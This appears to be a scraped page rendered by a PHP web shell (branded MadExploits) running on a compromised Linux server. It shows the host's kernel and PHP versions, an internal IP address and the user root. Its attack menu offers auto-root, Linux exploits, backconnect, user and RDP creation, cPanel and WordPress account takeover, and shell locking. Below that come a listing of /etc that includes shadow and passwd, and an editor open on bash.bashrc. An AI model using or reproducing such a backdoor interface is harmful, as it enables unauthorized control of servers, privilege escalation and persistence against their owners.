Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
[ DIR ]
drwxr-xr-x
apt
[ DIR ]
drwxr-xr-x
ca-certificates
[ DIR ]
drwxr-xr-x
cron.daily
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
dpkg
[ DIR ]
drwxr-xr-x
emacs
[ DIR ]
drwxr-xr-x
gss
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
logrotate.d
[ DIR ]
drwxr-xr-x
opt
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
perl
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
rc0.d
[ DIR ]
drwxr-xr-x
rc1.d
[ DIR ]
drwxr-xr-x
rc2.d
[ DIR ]
drwxr-xr-x
rc3.d
[ DIR ]
drwxr-xr-x
rc4.d
[ DIR ]
drwxr-xr-x
rc5.d
[ DIR ]
drwxr-xr-x
rc6.d
[ DIR ]
drwxr-xr-x
rcS.d
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
terminfo
[ DIR ]
drwxr-xr-x
update-motd.d
[ DIR ]
drwxr-xr-x
.pwd.lock
0
B
-rw-------
adduser.conf
3.89
KB
-rw-r--r--
bash.bashrc
1.95
KB
-rw-r--r--
bindresvport.blacklist
367
B
-rw-r--r--
ca-certificates.conf
6.27
KB
-rw-r--r--
debconf.conf
2.9
KB
-rw-r--r--
debian_version
5
B
-rw-r--r--
deluser.conf
1.67
KB
-rw-r--r--
environment
0
B
-rw-r--r--
fstab
37
B
-rw-r--r--
gai.conf
2.52
KB
-rw-r--r--
gprofng.rc
3.89
KB
-rw-r--r--
group
434
B
-rw-r--r--
group-
434
B
-rw-r--r--
gshadow
364
B
-rw-r-----
host.conf
9
B
-rw-r--r--
hostname
37
B
-rw-r--r--
hosts
233
B
-rw-r--r--
inputrc
1.83
KB
-rw-r--r--
issue
27
B
-rw-r--r--
issue.net
20
B
-rw-r--r--
ld.so.cache
7.88
KB
-rw-r--r--
ld.so.conf
34
B
-rw-r--r--
libaudit.conf
191
B
-rw-r--r--
localtime
114
B
-rw-r--r--
login.defs
5.8
KB
-rw-r--r--
magic
111
B
-rw-r--r--
magic.mime
111
B
-rw-r--r--
motd
286
B
-rw-r--r--
nsswitch.conf
494
B
-rw-r--r--
os-release
286
B
-rw-r--r--
pam.conf
552
B
-rw-r--r--
passwd
839
B
-rw-r--r--
passwd-
839
B
-rw-------
profile
828
B
-rw-r--r--
resolv.conf
41
B
-rw-r--r--
rmt
63.19
KB
-rwxr-xr-x
shadow
474
B
-rw-r-----
shells
118
B
-rw-r--r--
subgid
0
B
-rw-r--r--
subuid
0
B
-rw-r--r--
wgetrc
4.83
KB
-rw-r--r--
xattr.conf
681
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bash.bashrc
# System-wide .bashrc file for interactive bash(1) shells. # To enable the settings / commands in this file for login shells as well, # this file has to be sourced in /etc/profile. # If not running interactively, don't do anything [ -z "${PS1-}" ] && return # check the window size after each command and, if necessary, # update the values of LINES and COLUMNS. shopt -s checkwinsize # set variable identifying the chroot you work in (used in the prompt below) if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then debian_chroot=$(< /etc/debian_chroot) fi # set a fancy prompt (non-color, overwrite the one in /etc/profile) # but only if not SUDOing and have SUDO_PS1 set; then assume smart user. if ! [ -n "${SUDO_USER-}" -a -n "${SUDO_PS1-}" ]; then PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' fi # Commented out, don't overwrite xterm -T "title" -n "icontitle" by default. # If this is an xterm set the title to user@host:dir #case "$TERM" in #xterm*|rxvt*) # PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME}: ${PWD}\007"' # ;; #*) # ;; #esac # enable bash completion in interactive shells #if ! shopt -oq posix; then # if [ -f /usr/share/bash-completion/bash_completion ]; then # . /usr/share/bash-completion/bash_completion # elif [ -f /etc/bash_completion ]; then # . /etc/bash_completion # fi #fi # if the command-not-found package is installed, use it if [ -x /usr/lib/command-not-found -o -x /usr/share/command-not-found/command-not-found ]; then function command_not_found_handle { # check because c-n-f could've been removed in the meantime if [ -x /usr/lib/command-not-found ]; then /usr/lib/command-not-found -- "$1" return $? elif [ -x /usr/share/command-not-found/command-not-found ]; then /usr/share/command-not-found/command-not-found -- "$1" return $? else printf "%s: command not found\n" "$1" >&2 return 127 fi } fi
Close